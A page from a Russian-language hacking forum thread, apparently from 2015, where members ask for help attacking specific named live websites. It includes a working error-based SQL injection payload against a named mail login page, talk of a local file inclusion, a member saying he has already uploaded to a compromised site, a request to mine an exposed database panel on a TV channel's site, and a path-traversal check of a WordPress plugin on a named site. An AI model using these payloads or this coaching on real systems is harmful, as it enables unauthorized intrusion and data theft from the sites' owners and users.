HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 14 из 296 « Первая < 4 10 11 12 13 14 15 16 17 18 2464114 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #131  
Старый 01.06.2015, 16:25
huntercs16
Участник форума
Регистрация: 07.10.2013
Сообщений: 140
С нами: 6630806

Репутация: 6
По умолчанию
Цитата:
Если поставить в куки например a=1, то отдает другую страницу.

Что сделать можно?
 
Ответить с цитированием

  #132  
Старый 01.06.2015, 16:32
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами: 9721141

Репутация: 1013
По умолчанию
Цитата:
Сообщение от huntercs16  

Если поставить в куки например a=1, то отдает другую страницу.
Что сделать можно?
я же вам уже подсказывал в аналогичной ситуации. реферрер!
 
Ответить с цитированием

  #133  
Старый 01.06.2015, 16:34
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 12
С нами: 9176038

Репутация: 8
По умолчанию
Цитата:
Сообщение от huntercs16  

Если поставить в куки например a=1, то отдает другую страницу.
Что сделать можно?
Посочувствовать вашему опыту... Ведь перед вами настоящая LFI
 
Ответить с цитированием

  #134  
Старый 01.06.2015, 18:06
vikler
Познающий
Регистрация: 16.08.2012
Сообщений: 92
С нами: 7231286

Репутация: 0
По умолчанию
Ребят, помогите раскрутить. post инъекция в поле id

Код:
http://mail.topicimages.com/groupware/login.php
data:

Код:
mode=login&hmail_domain=topicimages.com&usb=&mac=&hmail_id=d'&hmail_pass=9&ck1=&ck2=
 
Ответить с цитированием

  #135  
Старый 01.06.2015, 18:08
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами: 9721141

Репутация: 1013
По умолчанию
Цитата:
Сообщение от vikler  

Ребят, помогите раскрутить. post инъекция в поле id
Код:
http://mail.topicimages.com/groupware/login.php
data:
Код:
mode=login&hmail_domain=topicimages.com&usb=&mac=&hmail_id=d'&hmail_pass=9&ck1=&ck2=
mode=login&hmail_domain=topicimages.com&usb=&mac=& hmail_id=d'and(extractvalue(1,concat(0x3a,version( ))))='1&hmail_pass=9&ck1=&ck2=
 
Ответить с цитированием

  #136  
Старый 01.06.2015, 18:22
YaBtr
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами: 7343606

Репутация: 652


По умолчанию
Цитата:
Сообщение от huntercs16  

Если поставить в куки например a=1, то отдает другую страницу.
Что сделать можно?
Тоже хочу что-нибудь заскринить
 
Ответить с цитированием

  #137  
Старый 01.06.2015, 18:27
huntercs16
Участник форума
Регистрация: 07.10.2013
Сообщений: 140
С нами: 6630806

Репутация: 6
По умолчанию
Цитата:
Сообщение от YaBtr  

Тоже хочу что-нибудь заскринить

Да я уже залился туда, спасибо.

Плагин глючит, который куки ставит
 
Ответить с цитированием

  #138  
Старый 01.06.2015, 19:25
Merl0k
Новичок
Регистрация: 17.10.2011
Сообщений: 14
С нами: 7669046

Репутация: 0
По умолчанию
Всем доброго дня. ) Наткнулся на сайте канала Перец на такой вот запрос: http://peretz.ru/ frontend_dev.php который вывел меня на панель БД. Сам я по БД не спец, поэтому обращаюсь к вам с вопросом можно ли выудить что-нибудь вкусное отсюда?
 
Ответить с цитированием

  #139  
Старый 02.06.2015, 04:31
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами: 5797046

Репутация: 40


По умолчанию
Доброе утро! Подскажите пожалуйста, тут можно что-нибудь сделать?

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//kenford.com.ua/wp-content/plugins/jquery-vertical-mega-menu/skin.php?skin=jj[/COLOR][/COLOR] 
frank,дружище, ты как всегда на высоте
 
Ответить с цитированием

  #140  
Старый 02.06.2015, 10:31
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами: 9721141

Репутация: 1013
По умолчанию
Цитата:
Сообщение от BabaDook  

Доброе утро! Подскажите пожалуйста, тут можно что-нибудь сделать?
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//kenford.com.ua/wp-content/plugins/jquery-vertical-mega-menu/skin.php?skin=jj[/COLOR][/COLOR] 
frank,дружище, ты как всегда на высоте
для начала идем на сайт вордпресса скачиваем исходники: https://wordpress.org/plugins/jquery...cal-mega-menu/

открываем skin.php и видим на 31 строке:

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$str[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"."[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$str[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$str[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"/"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$str[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR
т. е. за пределы директории выйти не получится. без этого бы могла быть читалка файлов
 
Ответить с цитированием
Ответ
Страница 14 из 296 « Первая < 4 10 11 12 13 14 15 16 17 18 2464114 > Последняя »



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.